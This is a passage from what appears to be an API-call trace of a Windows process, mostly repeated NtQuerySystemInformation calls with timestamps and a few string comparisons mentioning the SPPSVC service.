Length=0x0, ResultLength=0x0) [0208.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0208.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0208.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0208.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0208.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x28, ResultLength=0x0) [0208.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0208.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0208.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd410, Length=0x20, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd390, Length=0x20, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd390, Length=0x20, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd390, Length=0x20, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0208.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0208.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0208.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0208.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x40, ResultLength=0x0) [0208.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x40, ResultLength=0x0) [0208.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x40, ResultLength=0x0) [0208.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x30, ResultLength=0x0) [0208.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x30, ResultLength=0x0) [0208.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd948, Length=0x30, ResultLength=0x0) [0208.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0208.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0208.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0208.783] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0208.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0208.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0208.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0208.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0208.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x28, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0209.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0209.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0209.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0209.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0209.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0209.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0209.134] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0209.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0209.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0209.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0209.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x28, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0209.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0209.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0209.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0209.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0209.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0209.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0209.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0209.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0209.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0209.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0209.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0209.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0209.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd410, Length=0x28, ResultLength=0x0) [0209.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0209.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0209.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0209.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd330, Length=0x20, ResultLength=0x0) [0209.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0209.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0209.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0209.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0209.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, 